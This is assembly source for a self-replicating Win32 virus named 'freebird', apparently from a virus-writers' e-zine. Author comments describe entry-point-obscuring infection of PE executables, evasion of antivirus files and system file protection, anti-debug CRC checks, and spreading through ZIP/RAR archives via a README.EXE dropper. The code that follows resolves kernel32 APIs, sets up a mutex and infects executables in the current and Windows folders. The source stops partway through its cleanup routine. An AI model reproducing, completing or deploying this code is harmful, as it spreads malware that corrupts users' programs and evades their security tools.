;
; freebird
; Coded by Bumblebee
;
; This is the source code of a VIRUS. The author is in no way
; responsible for any damage that may occur due to its usage.
;
; Some comments:
;
; That's a win32 per-process resident and direct action EPO virus.
;
; It infects only files that have any import from kernel32.dll module
; because this import is used to retrieve k32 address (and needed API).
; It requires API to go back host (restore patched bytes into host code
; section). It won't modify the EP in the PE header, instead patches the
; host code inserting a jmp to the virus. Is not the ultimate EPO but
; works and it's very easy to code, better than nothing :)
;
; It updates the PE checksum of infected PE files using imagehlp.dll
; API. If this API is not available, it still infects (checksum is zero).
;
; It does self integrity check with CRC32. That's a simple but effective
; anti-debug trick and keeps virus pretty safe of hex hacking.
;
; Uses size padding as infection sign.
;
; It won't infect most of av soft looking for the usual stringz in the
; name of the disposable victim (AV, DR, SP, F-, AN, VE, CL, ON).
;
; Has a run-time part that will affect win32 PE files with EXE ext into
; current and windows folders. It skips system protected files (SFC).
; Infecting files into windows folder helps the virus to spread with the
; simple direct action schema. If that fails (due system protected files),
; then the per-process part is there.
;
; It uses kinda mutexes to avoid overloading the system with the run-time
; part. Due it uses shared memory by name as mutex, the name is random
; from serial number of c:\ drive and results from CPUID instruction ;)
;
; That name is used to uncompress a dropper and infect it. This file
; will be added to ZIP/RAR archives found in current folder. It will
; skip archives where 1st item is README.EXE (to avoid re-infection).
; It inserts the dropper at the beginning of the archives instead of
; appending the infected file to the end. Archive infection is a bit
; unoptimized O:) but quite clear to understand it.
;
; Per-process residence is performed as explained in an article released
; in this e-zine. I hook to check for directory changes: PostQuitMessage
; from USER32.DLL.
;
; It will get the needed API using GetProcAddress. And uses SEH to
; avoid crashes; it hangs the process when a fatal error occurs (e.g. if
; it cannot get the APIs to patch host code, it won't be able to go
; back host). At least a screen of death won't appear ;)
;
; Well, it's a neat virus. That was funny to code, even most parts are
; quite standard. I think that's the 2nd time i don't use crc32 for
; imports (the first one was win95.bumble, my 1st win appender), and is
; just due i was bored of the same crc32 code ever, and 2 facts:
; av stop study of viruses and... who cares with virus size? ;)
;
; I've developed it under win2k and tested under win98. That means it runs
; under windows 2000 without any problem (i cannot say the same about my
; previous 'win32' stuff). You only will notice it if thou get infected under
; such system ;)
;
; Finally i must say i'm in love with NASM, mainly due i have only this
; asm installed (fuck, and it fits in a single floppy: NASM+ALINK+DOCS+LIBS).
;
; Yes, it's Freebird from the Lynyrd Skynyrd song. Oh Lord, I can't change ;)
; Try to find this song and listen it reading this lame source and, at least
; and may be not at last, you'll listen good music.
;
; That's all. The source code is pretty clear, but we're living bad times
; for the vx. May be this bug is only interesting for a small group of vxers:
; those that are experienced but still can learn something from the bee.
;
; I'm not used to greet ppl, but since i'm lost in combat... here follow
; some:
;
; Perikles: I miss you, i'll try to meet you more often (use fweeder
; damnit, don't be afraid of vb huehe)
; Ratter: Seems now i'm newbie at your side... keep on rocking man
; Xezaw: We need young blood here... Metele canya pedacho gay!
; VirusBuster: Too much marulo around here, uhm XD
; Mental Driller: You're the master, don't fool saying is matter of time
; Super: Looking forward to see that .NET shit, and your ring0 tute?
; TCP: Congratulations (he got married?)
; Vecna: Hey favelado, te veo flojo. Para cuando el fin del mundo?
; 29Aers: You're all alone...
;
; And big cheers to other ppl i used to talk to and now i cannot due i'm
; in the shadows: Yello, Clau, f0re, Zert, Slow, soyuz, TheVoid, Sheroc,
; Tokugawa, Evul, Gigabyte, Wintermute, Malware (where are you?), Griyo,
; Roadkill, Black Jack, star0, Rajaat, ... i cannot remember you, sorry =]
;
;
; If you wanna contact with me, ask someone that can find me.
;
; - main.asm BOF -
[extern ExitProcess]
[segment .text]
[global main]
;-----------------------------------------------------------------------
; main - first-generation bootstrap (only present in the ALINK build;
;        it sits in .text, outside the vBegin..vBegin+vSize-4 span
;        that the body checksums, so it is not part of the body itself).
; Purpose: seed the in-body fields that the body at ventry expects a
;          previous infection to have patched (saved host bytes, import
;          slot, base address, self-CRC), then fall into the body.
; Refs:    fakeHost, epobuffTMP, __imp__, baseAddr, vBegin, vSize,
;          myCRC32, CRC32 and ventry are all defined outside this block.
; NOTE(review): CRC32's register contract is assumed from this call site
;          only (esi = start, edi = byte count, eax = result) - confirm
;          against its definition before relying on it in analysis.
; Analyst note: the body recomputes the same CRC at ventry and spins
;          (jmp $) on mismatch, so the stored myCRC32 is the value any
;          detection/unpacking tooling should expect to see there.
;-----------------------------------------------------------------------
main:
lea esi,[fakeHost] ; setup fake 1st gen: copy the 5 "saved host" bytes
lea edi,[epobuffTMP] ; (presumably the size of the patched-in jmp the
mov ecx,5 ; header comment describes) into the body's buffer
rep movsb
lea edx,[fake_import] ; point the body's import slot at the fake IAT
mov [__imp__],edx ; entry below instead of a real host import
mov eax,400000h ; def base addr (conventional default image base)
mov [baseAddr],eax
lea esi,[vBegin] ; self-CRC over the body, excluding its last 4 bytes
mov edi,vSize-4
call CRC32
mov [myCRC32],eax ; stored where the body's integrity check reads it
jmp ventry ; enter the body exactly as an infected host would
fake_import dd 077e80000h ; developed under win2k: the body dereferences
; this via __imp__ and uses the value as the
; starting point of its page-wise MZ scan
;
; Since win doesn't implement code protection (via segment, thus under intel
; arch the only way to do it coz pages don't have code/data attrib), that's
; a nice way to 1st gen without external PE patcher.
;
[segment .data]
ventry:
vBegin equ $
push eax ; room for ret addr
pushad
pushfd
call getDelta
lea esi,[vBegin+ebp]
mov edi,vSize-4
call CRC32 ; integrity check
mov ecx,[myCRC32+ebp]
sub ecx,eax
jecxz mycrc32ok
jmp $
mycrc32ok:
lea edi,[startUp+ebp] ; setup return
lea esi,[infectTMP+ebp] ; stuff saved in
add ecx,infectTMPlen ; infection with anti-debug
rep movsb ; (ecx must be zero at this
; point)
mov edx,12345678h
__imp__ equ $-4
mov esi,[reloc+ebp]
lea eax,[vBegin+ebp]
sub esi,eax ; this virus supports relocs
add [baseAddr+ebp],esi ; fix base addr (reloc)
add [hostEP+ebp],esi ; fix host entry point
add edx,esi ; use import to find
mov edx,[edx] ; k32 base address
xor eax,eax
call seh
jmp $ ; if we're not able to
; locate k32 we cannot
; get APIs and jmp back
; host is not possible
;
; Some stringz for the avers
;
db "[ FREEBIRD: I make birds of mud and I throw them to fly ]"
seh:
push dword [fs:eax]
mov dword [fs:eax],esp
and edx,0fffff000h ; simple k32 scan
add edx,1000h
findK32BaseAddrLoop:
sub edx,1000h
cmp word [edx],'MZ'
jne findK32BaseAddrLoop
movzx eax,word [edx+3ch]
cmp edx,dword [eax+edx+34h]
jne findK32BaseAddrLoop
mov [kerneldll+ebp],edx
xor eax,eax ; remove SEH frame
pop dword [fs:eax]
pop eax
scanKerneldll:
mov ebx,12345678h ; get GetProcAddress
kerneldll equ $-4
mov edi,ebx
mov esi,edi
add esi,3ch
lodsd
add eax,edi
xchg eax,esi
mov esi,dword [esi+78h]
add esi,ebx
add esi,1ch
lodsd
add eax,edi
mov [address+ebp],eax
lodsd
add eax,edi
mov [names+ebp],eax
lodsd
add eax,edi
mov [ordinals+ebp],eax
xor edx,edx
lea esi,[GetProcAddress+ebp]
mov ecx,GetProcAddresslen
searchl:
push ecx
push esi
mov edi,[names+ebp]
add edi,edx
mov edi,[edi]
add edi,ebx
rep cmpsb
je fFound
add edx,4
pop esi
pop ecx
jmp searchl
fFound:
pop esi
pop ecx
shr edx,1
add edx,[ordinals+ebp]
movzx ebx,word [edx]
shl ebx,2
add ebx,[address+ebp]
mov ecx,[ebx]
add ecx,[kerneldll+ebp]
getAPI:
mov [_GetProcAddress+ebp],ecx
lea esi,[API0+ebp] ; now get APIs
getAPILoop:
push esi
xor eax,eax
lodsb
push eax
add esi,4
push esi
push dword [kerneldll+ebp]
call dword [_GetProcAddress+ebp]
pop ecx
pop esi
mov [esi+1],eax
add esi,ecx
jecxz getAPILoopDone
jmp getAPILoop
getAPILoopDone:
xor eax,eax
push eax
push eax
push eax
push eax
lea esi,[serialNum+ebp]
push esi
mov [esi],eax ; fix string
push eax
push eax
lea esi,[drive+ebp]
push esi
call dword [_GetVolumeInformationA+ebp] ; get serial number of
or eax,eax ; c: drive
jnz randomOk
mov dword [serialNum+ebp],12345678h ; that's not random!
randomOk:
xor eax,eax
inc eax
cpuid ; mutex depends on CPU
or eax,edx
xor dword [serialNum+ebp],eax ; fuck you avers! hueheh
; random? XD
and dword [serialNum+ebp],0f0f0f0fh ; build rnd string
or dword [serialNum+ebp],"aaaa"
; why that pseudo random? we don't want the avers create
; their artificial mutex to fool the virus, do we?
; check our mutex to avoid overload the system with
; several instances of the virus infecting arround
; all at the same time...
xor eax,eax
lea esi,[serialNum+ebp]
push esi
push dword 1024
push eax
push dword 4
push eax
dec eax
push eax
call dword [_CreateFileMappingA+ebp]
or eax,eax
jz near failedToLoadDll
mov [mutexHnd+ebp],eax
call dword [_GetLastError+ebp] ; already there?
cmp eax,0b7h
je near closeMutex
lea esi,[imagehlpdll+ebp] ; load imagehlp dll
push esi
call dword [_LoadLibraryA+ebp]
or eax,eax
jz near closeMutex
mov [_imagehlpdll+ebp],eax
lea esi,[CheckSumMappedFile+ebp] ; get API for PE checksum
push esi
push eax
call dword [_GetProcAddress+ebp]
mov [_CheckSumMappedFile+ebp],eax
lea esi,[sfcdll+ebp] ; load sfc dll
push esi
call dword [_LoadLibraryA+ebp]
mov [_sfcdll+ebp],eax
or eax,eax
jz near noSfc
lea esi,[SfcIsFileProtected+ebp] ; get API to avoid sfc
push esi
push eax
call dword [_GetProcAddress+ebp]
noSfc:
mov [_SfcIsFileProtected+ebp],eax
; hey bumble, remember that must be before any infection!
call setupPerProcess ; setup per-process
; hooks
; now the run-time part
lea esi,[path0+ebp]
push esi
push dword 260
call dword [_GetCurrentDirectoryA+ebp]
or eax,eax
jz endRuntimePart
push dword 260
lea esi,[path1+ebp]
push esi
call dword [_GetWindowsDirectoryA+ebp]
or eax,eax
jz endRuntimePart
mov ecx,eax ; if we're yet into
lea esi,[path0+ebp] ; windows folder, avoid
lea edi,[path1+ebp] ; infect more files
rep cmpsb
je endRuntimePart
call scandirpe ; infect current folder
lea esi,[path1+ebp]
push esi
call dword [_SetCurrentDirectoryA+ebp]
or eax,eax
jz endRuntimePart
call scandirpe ; affect windows folder
lea esi,[path0+ebp] ; go back home
push esi
call dword [_SetCurrentDirectoryA+ebp]
call findArchives ; self explanatory XD
endRuntimePart:
mov eax,[_sfcdll+ebp] ; free it only if loaded
or eax,eax ; (of coz hehe)
jz sfcNotLoaded
push dword [_sfcdll+ebp]
call dword [_FreeLibrary+ebp]
sfcNotLoaded:
push dword [_imagehlpdll+ebp] ; good guys release the dlls
call dword [_FreeLibrary+ebp]
closeMutex:
push dword [mutexHnd+ebp] ; close the 'mutex'
call dword [_CloseHandle+ebp]
failedToLoadDll: